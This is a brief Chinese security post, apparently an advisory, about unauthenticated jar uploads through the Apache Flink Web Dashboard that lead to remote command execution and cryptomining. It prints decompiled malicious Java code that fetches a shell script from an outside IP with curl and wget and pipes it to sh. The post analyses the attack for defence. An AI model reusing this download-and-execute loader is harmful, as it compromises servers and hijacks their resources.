【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞
介绍
攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗
通过反编译得到的恶意代码:
package com.example;
import java.io.IOException;
public class Main {
public Main() {
}
public static void main(String[] var0) throws IOException {
String var1 = "142.44.191.122/f.sh";
String var2 = "curl " + var1 + "|sh";
String[] var3 = new String[]{"/bin/bash", "-c", var2};
Runtime.getRuntime().exec(var3);
String var4 = "wget -q -O - " + var1 + "|sh";
String[] var5 = new String[]{"/bin/bash", "-c", var4};
Runtime.getRuntime().exec(var5);
}
}